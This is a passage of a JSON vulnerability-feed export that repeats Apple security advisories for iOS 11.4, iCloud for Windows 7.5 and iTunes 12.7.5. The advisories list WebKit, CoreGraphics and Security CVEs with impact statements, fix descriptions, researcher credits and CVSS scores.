spoofing\n\nDescription: An inconsistent user interface issue was addressed with improved state management.\n\nCVE-2018-4188: YoKo Kho (@YoKoAcc) of Mitra Integrasi Informatika, PT\n\n**WebKit**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed with improved memory handling.\n\nCVE-2018-4201: an anonymous researcher\n\nCVE-2018-4218: natashenka of Google Project Zero\n\nCVE-2018-4233: Samuel Gro\u00df (@5aelo) working with Trend Micro\u2019s Zero Day Initiative\n\n**WebKit**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A buffer overflow issue was addressed with improved memory handling.\n\nCVE-2018-4199: Alex Plaskett, Georgi Geshev, and Fabi Beterke of MWR Labs working with Trend Micro\u2019s Zero Day Initiative\n\nEntry updated June 14, 2018\n\n**WebKit**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: Visiting a maliciously crafted website may lead to cookies being overwritten\n\nDescription: A permissions issue existed in the handling of web browser cookies. This issue was addressed with improved restrictions.\n\nCVE-2018-4232: an anonymous researcher, Aymeric Chaib\n\n**WebKit**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A race condition was addressed with improved locking.\n\nCVE-2018-4192: Markus Gaasedelen, Amy Burnett, and Patrick Biernat of Ret2 Systems, Inc working with Trend Micro\u2019s Zero Day Initiative\n\nEntry updated October 8, 2019\n\n**WebKit**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: Processing maliciously crafted web content may lead to an unexpected Safari crash\n\nDescription: A memory corruption issue was addressed with improved input validation.\n\nCVE-2018-4214: found by OSS-Fuzz\n\n**WebKit**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2018-4204: found by OSS-Fuzz, Richard Zhu (fluorescence) working with Trend Micro's Zero Day Initiative\n\n**WebKit**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A type confusion issue was addressed with improved memory handling.\n\nCVE-2018-4246: found by OSS-Fuzz\n\n**WebKit**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: Visiting a maliciously crafted website may leak sensitive data\n\nDescription: Credentials were unexpectedly sent when fetching CSS mask images. This was addressed by using a CORS-enabled fetch method.\n\nCVE-2018-4190: Jun Kokatsu (@shhnjk)\n\n**WebKit**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: An out-of-bounds read was addressed with improved input validation.\n\nCVE-2018-4222: natashenka of Google Project Zero\n\nInformation about products not manufactured by Apple, or independent websites not controlled or tested by Apple, is provided without recommendation or endorsement. Apple assumes no responsibility with regard to the selection, performance, or use of third-party websites or products. Apple makes no representations regarding third-party website accuracy or reliability. [Contact the vendor](<http://support.apple.com/kb/HT2693>) for additional information.\n\nPublished Date: March 05, 2021\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-05-29T00:00:00", "type": "apple", "title": "About the security content of iOS 11.4", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-4100", "CVE-2018-4188", "CVE-2018-4190", "CVE-2018-4192", "CVE-2018-4194", "CVE-2018-4198", "CVE-2018-4199", "CVE-2018-4201", "CVE-2018-4202", "CVE-2018-4204", "CVE-2018-4211", "CVE-2018-4214", "CVE-2018-4215", "CVE-2018-4218", "CVE-2018-4221", "CVE-2018-4222", "CVE-2018-4223", "CVE-2018-4224", "CVE-2018-4225", "CVE-2018-4226", "CVE-2018-4227", "CVE-2018-4232", "CVE-2018-4233", "CVE-2018-4235", "CVE-2018-4237", "CVE-2018-4238", "CVE-2018-4239", "CVE-2018-4240", "CVE-2018-4241", "CVE-2018-4243", "CVE-2018-4244", "CVE-2018-4246", "CVE-2018-4247", "CVE-2018-4249", "CVE-2018-4250", "CVE-2018-4252", "CVE-2018-4330", "CVE-2018-4404", "CVE-2018-5383"], "modified": "2018-05-29T00:00:00", "id": "APPLE:3E3CB5751137153F5BC9BA4A69ABC13D", "href": "https://support.apple.com/kb/HT208848", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-24T20:42:58", "description": "## About Apple security updates\n\nFor our customers' protection, Apple doesn't disclose, discuss, or confirm security issues until an investigation has occurred and patches or releases are available. Recent releases are listed on the [Apple security updates](<https://support.apple.com/kb/HT201222>) page.\n\nFor more information about security, see the [Apple Product Security](<https://support.apple.com/kb/HT201220>) page. You can encrypt communications with Apple using the [Apple Product Security PGP Key](<https://support.apple.com/kb/HT201601>).\n\nApple security documents reference vulnerabilities by [CVE-ID](<http://cve.mitre.org/about/>) when possible.\n\n\n\n## iCloud for Windows 7.5\n\nReleased June 1, 2018\n\n**CoreGraphics**\n\nAvailable for: Windows 7 and later\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: An out-of-bounds read was addressed with improved input validation.\n\nCVE-2018-4194: Jihui Lu of Tencent KeenLab, Yu Zhou of Ant-financial Light-Year Security Lab\n\nEntry added June 21, 2018\n\n**Security**\n\nAvailable for: Windows 7 and later\n\nImpact: A local user may be able to read a persistent device identifier\n\nDescription: An authorization issue was addressed with improved state management.\n\nCVE-2018-4224: Abraham Masri (@cheesecakeufo)\n\n**Security**\n\nAvailable for: Windows 7 and later\n\nImpact: A local user may be able to modify the state of the Keychain\n\nDescription: An authorization issue was addressed with improved state management.\n\nCVE-2018-4225: Abraham Masri (@cheesecakeufo)\n\n**Security**\n\nAvailable for: Windows 7 and later\n\nImpact: A local user may be able to view sensitive user information\n\nDescription: An authorization issue was addressed with improved state management.\n\nCVE-2018-4226: Abraham Masri (@cheesecakeufo)\n\n**WebKit**\n\nAvailable for: Windows 7 and later\n\nImpact: Visiting a maliciously crafted website may lead to cookies being overwritten\n\nDescription: A permissions issue existed in the handling of web browser cookies. This issue was addressed with improved restrictions.\n\nCVE-2018-4232: an anonymous researcher, Aymeric Chaib\n\n**WebKit**\n\nAvailable for: Windows 7 and later\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A race condition was addressed with improved locking.\n\nCVE-2018-4192: Markus Gaasedelen, Amy Burnett, and Patrick Biernat of Ret2 Systems, Inc working with Trend Micro\u2019s Zero Day Initiative\n\nEntry updated October 8, 2019\n\n**WebKit**\n\nAvailable for: Windows 7 and later\n\nImpact: Processing maliciously crafted web content may lead to an unexpected Safari crash\n\nDescription: A memory corruption issue was addressed with improved input validation.\n\nCVE-2018-4214: found by OSS-Fuzz\n\n**WebKit**\n\nAvailable for: Windows 7 and later\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2018-4204: found by OSS-Fuzz, Richard Zhu (fluorescence) working with Trend Micro's Zero Day Initiative\n\n**WebKit**\n\nAvailable for: Windows 7 and later\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A type confusion issue was addressed with improved memory handling.\n\nCVE-2018-4246: found by OSS-Fuzz\n\n**WebKit**\n\nAvailable for: Windows 7 and later\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A memory corruption issue was addressed with improved state management.\n\nCVE-2018-4200: Ivan Fratric of Google Project Zero\n\n**WebKit**\n\nAvailable for: Windows 7 and later\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed with improved memory handling.\n\nCVE-2018-4201: an anonymous researcher\n\nCVE-2018-4218: Natalie Silvanovich of Google Project Zero\n\nCVE-2018-4233: Samuel Gro\u00df (@5aelo) working with Trend Micro\u2019s Zero Day Initiative\n\n**WebKit**\n\nAvailable for: Windows 7 and later\n\nImpact: Visiting a malicious website may lead to address bar spoofing\n\nDescription: An inconsistent user interface issue was addressed with improved state management.\n\nCVE-2018-4188: YoKo Kho (@YoKoAcc) of Mitra Integrasi Informatika, PT\n\n**WebKit**\n\nAvailable for: Windows 7 and later\n\nImpact: Visiting a maliciously crafted website may leak sensitive data\n\nDescription: Credentials were unexpectedly sent when fetching CSS mask images. This was addressed by using a CORS-enabled fetch method.\n\nCVE-2018-4190: Jun Kokatsu (@shhnjk)\n\n**WebKit**\n\nAvailable for: Windows 7 and later\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A buffer overflow issue was addressed with improved memory handling.\n\nCVE-2018-4199: Alex Plaskett, Georgi Geshev, and Fabi Beterke of MWR Labs working with Trend Micro\u2019s Zero Day Initiative\n\nEntry updated June 14, 2018\n\n**WebKit**\n\nAvailable for: Windows 7 and later\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: An out-of-bounds read was addressed with improved input validation.\n\nCVE-2018-4222: Natalie Silvanovich of Google Project Zero\n", "edition": 3, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2019-10-08T03:48:52", "title": "About the security content of iCloud for Windows 7.5 - Apple Support", "type": "apple", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-4225", "CVE-2018-4194", "CVE-2018-4188", "CVE-2018-4199", "CVE-2018-4224", "CVE-2018-4190", "CVE-2018-4233", "CVE-2018-4222", "CVE-2018-4192", "CVE-2018-4204", "CVE-2018-4201", "CVE-2018-4218", "CVE-2018-4246", "CVE-2018-4214", "CVE-2018-4232", "CVE-2018-4200", "CVE-2018-4226"], "modified": "2019-10-08T03:48:52", "id": "APPLE:HT208853", "href": "https://support.apple.com/kb/HT208853", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-03-14T04:14:31", "description": "# About the security content of iCloud for Windows 7.5\n\nThis document describes the security content of iCloud for Windows 7.5.\n\n## About Apple security updates\n\nFor our customers' protection, Apple doesn't disclose, discuss, or confirm security issues until an investigation has occurred and patches or releases are available. Recent releases are listed on the [Apple security updates](<https://support.apple.com/kb/HT201222>) page.\n\nFor more information about security, see the [Apple Product Security](<https://support.apple.com/kb/HT201220>) page. You can encrypt communications with Apple using the [Apple Product Security PGP Key](<https://support.apple.com/kb/HT201601>).\n\nApple security documents reference vulnerabilities by [CVE-ID](<http://cve.mitre.org/about/>) when possible.\n\n\n\n## iCloud for Windows 7.5\n\nReleased June 1, 2018\n\n**CoreGraphics**\n\nAvailable for: Windows 7 and later\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: An out-of-bounds read was addressed with improved input validation.\n\nCVE-2018-4194: Jihui Lu of Tencent KeenLab, Yu Zhou of Ant-financial Light-Year Security Lab\n\nEntry added June 21, 2018\n\n**Security**\n\nAvailable for: Windows 7 and later\n\nImpact: A local user may be able to read a persistent device identifier\n\nDescription: An authorization issue was addressed with improved state management.\n\nCVE-2018-4224: Abraham Masri (@cheesecakeufo)\n\n**Security**\n\nAvailable for: Windows 7 and later\n\nImpact: A local user may be able to modify the state of the Keychain\n\nDescription: An authorization issue was addressed with improved state management.\n\nCVE-2018-4225: Abraham Masri (@cheesecakeufo)\n\n**Security**\n\nAvailable for: Windows 7 and later\n\nImpact: A local user may be able to view sensitive user information\n\nDescription: An authorization issue was addressed with improved state management.\n\nCVE-2018-4226: Abraham Masri (@cheesecakeufo)\n\n**WebKit**\n\nAvailable for: Windows 7 and later\n\nImpact: Visiting a maliciously crafted website may lead to cookies being overwritten\n\nDescription: A permissions issue existed in the handling of web browser cookies. This issue was addressed with improved restrictions.\n\nCVE-2018-4232: an anonymous researcher, Aymeric Chaib\n\n**WebKit**\n\nAvailable for: Windows 7 and later\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A race condition was addressed with improved locking.\n\nCVE-2018-4192: Markus Gaasedelen, Amy Burnett, and Patrick Biernat of Ret2 Systems, Inc working with Trend Micro\u2019s Zero Day Initiative\n\nEntry updated October 8, 2019\n\n**WebKit**\n\nAvailable for: Windows 7 and later\n\nImpact: Processing maliciously crafted web content may lead to an unexpected Safari crash\n\nDescription: A memory corruption issue was addressed with improved input validation.\n\nCVE-2018-4214: found by OSS-Fuzz\n\n**WebKit**\n\nAvailable for: Windows 7 and later\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2018-4204: found by OSS-Fuzz, Richard Zhu (fluorescence) working with Trend Micro's Zero Day Initiative\n\n**WebKit**\n\nAvailable for: Windows 7 and later\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A type confusion issue was addressed with improved memory handling.\n\nCVE-2018-4246: found by OSS-Fuzz\n\n**WebKit**\n\nAvailable for: Windows 7 and later\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A memory corruption issue was addressed with improved state management.\n\nCVE-2018-4200: Ivan Fratric of Google Project Zero\n\n**WebKit**\n\nAvailable for: Windows 7 and later\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed with improved memory handling.\n\nCVE-2018-4201: an anonymous researcher\n\nCVE-2018-4218: natashenka of Google Project Zero\n\nCVE-2018-4233: Samuel Gro\u00df (@5aelo) working with Trend Micro\u2019s Zero Day Initiative\n\n**WebKit**\n\nAvailable for: Windows 7 and later\n\nImpact: Visiting a malicious website may lead to address bar spoofing\n\nDescription: An inconsistent user interface issue was addressed with improved state management.\n\nCVE-2018-4188: YoKo Kho (@YoKoAcc) of Mitra Integrasi Informatika, PT\n\n**WebKit**\n\nAvailable for: Windows 7 and later\n\nImpact: Visiting a maliciously crafted website may leak sensitive data\n\nDescription: Credentials were unexpectedly sent when fetching CSS mask images. This was addressed by using a CORS-enabled fetch method.\n\nCVE-2018-4190: Jun Kokatsu (@shhnjk)\n\n**WebKit**\n\nAvailable for: Windows 7 and later\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A buffer overflow issue was addressed with improved memory handling.\n\nCVE-2018-4199: Alex Plaskett, Georgi Geshev, and Fabi Beterke of MWR Labs working with Trend Micro\u2019s Zero Day Initiative\n\nEntry updated June 14, 2018\n\n**WebKit**\n\nAvailable for: Windows 7 and later\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: An out-of-bounds read was addressed with improved input validation.\n\nCVE-2018-4222: natashenka of Google Project Zero\n\nInformation about products not manufactured by Apple, or independent websites not controlled or tested by Apple, is provided without recommendation or endorsement. Apple assumes no responsibility with regard to the selection, performance, or use of third-party websites or products. Apple makes no representations regarding third-party website accuracy or reliability. [Contact the vendor](<http://support.apple.com/kb/HT2693>) for additional information.\n\nPublished Date: March 05, 2021\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-06-01T00:00:00", "type": "apple", "title": "About the security content of iCloud for Windows 7.5", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-4188", "CVE-2018-4190", "CVE-2018-4192", "CVE-2018-4194", "CVE-2018-4199", "CVE-2018-4200", "CVE-2018-4201", "CVE-2018-4204", "CVE-2018-4214", "CVE-2018-4218", "CVE-2018-4222", "CVE-2018-4224", "CVE-2018-4225", "CVE-2018-4226", "CVE-2018-4232", "CVE-2018-4233", "CVE-2018-4246"], "modified": "2018-06-01T00:00:00", "id": "APPLE:E812EA31700014D3FE21E3572E9BD5B3", "href": "https://support.apple.com/kb/HT208853", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-24T20:42:45", "description": "## About Apple security updates\n\nFor our customers' protection, Apple doesn't disclose, discuss, or confirm security issues until an investigation has occurred and patches or releases are available. Recent releases are listed on the [Apple security updates](<https://support.apple.com/kb/HT201222>) page.\n\nFor more information about security, see the [Apple Product Security](<https://support.apple.com/kb/HT201220>) page. You can encrypt communications with Apple using the [Apple Product Security PGP Key](<https://support.apple.com/kb/HT201601>).\n\nApple security documents reference vulnerabilities by [CVE-ID](<http://cve.mitre.org/about/>) when possible.\n\n\n\n## iTunes 12.7.5 for Windows\n\nReleased May 29, 2018\n\n**CoreGraphics**\n\nAvailable for: Windows 7 and later\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: An out-of-bounds read was addressed with improved input validation.\n\nCVE-2018-4194: Jihui Lu of Tencent KeenLab, Yu Zhou of Ant-financial Light-Year Security Lab\n\nEntry added June 21, 2018\n\n**Security**\n\nAvailable for: Windows 7 and later\n\nImpact: A local user may be able to read a persistent device identifier\n\nDescription: An authorization issue was addressed with improved state management.\n\nCVE-2018-4224: Abraham Masri (@cheesecakeufo)\n\n**Security**\n\nAvailable for: Windows 7 and later\n\nImpact: A local user may be able to modify the state of the Keychain\n\nDescription: An authorization issue was addressed with improved state management.\n\nCVE-2018-4225: Abraham Masri (@cheesecakeufo)\n\n**Security**\n\nAvailable for: Windows 7 and later\n\nImpact: A local user may be able to view sensitive user information\n\nDescription: An authorization issue was addressed with improved state management.\n\nCVE-2018-4226: Abraham Masri (@cheesecakeufo)\n\n**WebKit**\n\nAvailable for: Windows 7 and later\n\nImpact: Visiting a maliciously crafted website may lead to cookies being overwritten\n\nDescription: A permissions issue existed in the handling of web browser cookies. This issue was addressed with improved restrictions.\n\nCVE-2018-4232: an anonymous researcher, Aymeric Chaib\n\n**WebKit**\n\nAvailable for: Windows 7 and later\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A race condition was addressed with improved locking.\n\nCVE-2018-4192: Markus Gaasedelen, Amy Burnett, and Patrick Biernat of Ret2 Systems, Inc working with Trend Micro\u2019s Zero Day Initiative\n\nEntry updated October 8, 2019\n\n**WebKit**\n\nAvailable for: Windows 7 and later\n\nImpact: Processing maliciously crafted web content may lead to an unexpected Safari crash\n\nDescription: A memory corruption issue was addressed with improved input validation.\n\nCVE-2018-4214: found by OSS-Fuzz\n\n**WebKit**\n\nAvailable for: Windows 7 and later\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2018-4204: found by OSS-Fuzz, Richard Zhu (fluorescence) working with Trend Micro's Zero Day Initiative\n\n**WebKit**\n\nAvailable for: Windows 7 and later\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A type confusion issue was addressed with improved memory handling.\n\nCVE-2018-4246: found by OSS-Fuzz\n\n**WebKit**\n\nAvailable for: Windows 7 and later\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A memory corruption issue was addressed with improved state management.\n\nCVE-2018-4200: Ivan Fratric of Google Project Zero\n\n**WebKit**\n\nAvailable for: Windows 7 and later\n\nImpact: Visiting a malicious website may lead to address bar spoofing\n\nDescription: An inconsistent user interface issue was addressed with improved state management.\n\nCVE-2018-4188: YoKo Kho (@YoKoAcc) of Mitra Integrasi Informatika, PT\n\n**WebKit**\n\nAvailable for: Windows 7 and later\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed with improved memory handling.\n\nCVE-2018-4201: an anonymous researcher\n\nCVE-2018-4218: Natalie Silvanovich of Google Project Zero\n\nCVE-2018-4233: Samuel Gro\u00df (@5aelo) working with Trend Micro\u2019s Zero Day Initiative\n\n**WebKit**\n\nAvailable for: Windows 7 and later\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A buffer overflow issue was addressed with improved memory handling.\n\nCVE-2018-4199: Alex Plaskett, Georgi Geshev, and Fabi Beterke of MWR Labs working with Trend Micro\u2019s Zero Day Initiative\n\nEntry updated June 14, 2018\n\n**WebKit**\n\nAvailable for: Windows 7 and later\n\nImpact: Visiting a maliciously crafted website may leak sensitive data\n\nDescription: Credentials were unexpectedly sent when fetching CSS mask images. This was addressed by using a CORS-enabled fetch method.\n\nCVE-2018-4190: Jun Kokatsu (@shhnjk)\n\n**WebKit**\n\nAvailable for: Windows 7 and later\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: An out-of-bounds read was addressed with improved input validation.\n\nCVE-2018-4222: Natalie Silvanovich of Google Project Zero\n\n**WebKit**\n\nAvailable for: Windows 7 and later\n\nImpact: Processing maliciously crafted web content may lead to code execution\n\nDescription: Multiple memory corruption issues were addressed with improved memory handling.\n\nCVE-2018-4145: found by OSS-Fuzz\n\nEntry added October 18, 2018\n", "edition": 3, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2019-10-08T03:44:36", "title": "About the security content of iTunes 12.7.5 for Windows - Apple Support", "type": "apple", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-4225", "CVE-2018-4194", "CVE-2018-4188", "CVE-2018-4199", "CVE-2018-4224", "CVE-2018-4190", "CVE-2018-4145", "CVE-2018-4233", "CVE-2018-4222", "CVE-2018-4192", "CVE-2018-4204", "CVE-2018-4201", "CVE-2018-4218", "CVE-2018-4246", "CVE-2018-4214", "CVE-2018-4232", "CVE-2018-4200", "CVE-2018-4226"], "modified": "2019-10-08T03:44:36", "id": "APPLE:HT208852", "href": "https://support.apple.com/kb/HT208852", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-03-14T04:14:33", "description": "# About the security content of iTunes 12.7.5 for Windows\n\nThis document describes the security content of iTunes 12.7.5 for Windows.\n\n## About Apple security updates\n\nFor our customers' protection, Apple doesn't disclose, discuss, or confirm security issues until an investigation has occurred and patches or releases are available. Recent releases are listed on the [Apple security updates](<https://support.apple.com/kb/HT201222>) page.\n\nFor more information about security, see the [Apple Product Security](<https://support.apple.com/kb/HT201220>) page. You can encrypt communications with Apple using the [Apple Product Security PGP Key](<https://support.apple.com/kb/HT201601>).\n\nApple security documents reference vulnerabilities by [CVE-ID](<http://cve.mitre.org/about/>) when possible.\n\n\n\n## iTunes 12.7.5 for Windows\n\nReleased May 29, 2018\n\n**CoreGraphics**\n\nAvailable for: Windows 7 and later\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: An out-of-bounds read was addressed with improved input validation.\n\nCVE-2018-4194: Jihui Lu of Tencent KeenLab, Yu Zhou of Ant-financial Light-Year Security Lab\n\nEntry added June 21, 2018\n\n**Security**\n\nAvailable for: Windows 7 and later\n\nImpact: A local user may be able to read a persistent device identifier\n\nDescription: An authorization issue was addressed with improved state management.\n\nCVE-2018-4224: Abraham Masri (@cheesecakeufo)\n\n**Security**\n\nAvailable for: Windows 7 and later\n\nImpact: A local user may be able to modify the state of the Keychain\n\nDescription: An authorization issue was addressed with improved state management.\n\nCVE-2018-4225: Abraham Masri (@cheesecakeufo)\n\n**Security**\n\nAvailable for: Windows 7 and later\n\nImpact: A local user may be able to view sensitive user information\n\nDescription: An authorization issue was addressed with improved state management.\n\nCVE-2018-4226: Abraham Masri (@cheesecakeufo)\n\n**WebKit**\n\nAvailable for: Windows 7 and later\n\nImpact: Visiting a maliciously crafted website may lead to cookies being overwritten\n\nDescription: A permissions issue existed in the handling of web browser cookies. This issue was addressed with improved restrictions.\n\nCVE-2018-4232: an anonymous researcher, Aymeric Chaib\n\n**WebKit**\n\nAvailable for: Windows 7 and later\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A race condition was addressed with improved locking.\n\nCVE-2018-4192: Markus Gaasedelen, Amy Burnett, and Patrick Biernat of Ret2 Systems, Inc working with Trend Micro\u2019s Zero Day Initiative\n\nEntry updated October 8, 2019\n\n**WebKit**\n\nAvailable for: Windows 7 and later\n\nImpact: Processing maliciously crafted web content may lead to an unexpected Safari crash\n\nDescription: A memory corruption issue was addressed with improved input validation.\n\nCVE-2018-4214: found by OSS-Fuzz\n\n**WebKit**\n\nAvailable for: Windows 7 and later\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2018-4204: found by OSS-Fuzz, Richard Zhu (fluorescence) working with Trend Micro's Zero Day Initiative\n\n**WebKit**\n\nAvailable for: Windows 7 and later\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A type confusion issue was addressed with improved memory handling.\n\nCVE-2018-4246: found by OSS-Fuzz\n\n**WebKit**\n\nAvailable for: Windows 7 and later\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A memory corruption issue was addressed with improved state management.\n\nCVE-2018-4200: Ivan Fratric of Google Project Zero\n\n**WebKit**\n\nAvailable for: Windows 7 and later\n\nImpact: Visiting a malicious website may lead to address bar spoofing\n\nDescription: An inconsistent user interface issue was addressed with improved state management.\n\nCVE-2018-4188: YoKo Kho (@YoKoAcc) of Mitra Integrasi Informatika, PT\n\n**WebKit**\n\nAvailable for: Windows 7 and later\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed with improved memory handling.\n\nCVE-2018-4201: an anonymous researcher\n\nCVE-2018-4218: natashenka of Google Project Zero\n\nCVE-2018-4233: Samuel Gro\u00df (@5aelo) working with Trend Micro\u2019s Zero Day Initiative\n\n**WebKit**\n\nAvailable for: Windows 7 and later\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A buffer overflow issue was addressed with improved memory handling.\n\nCVE-2018-4199: Alex Plaskett, Georgi Geshev, and Fabi Beterke of MWR Labs working with Trend Micro\u2019s Zero Day Initiative\n\nEntry updated June 14, 2018\n\n**WebKit**\n\nAvailable for: Windows 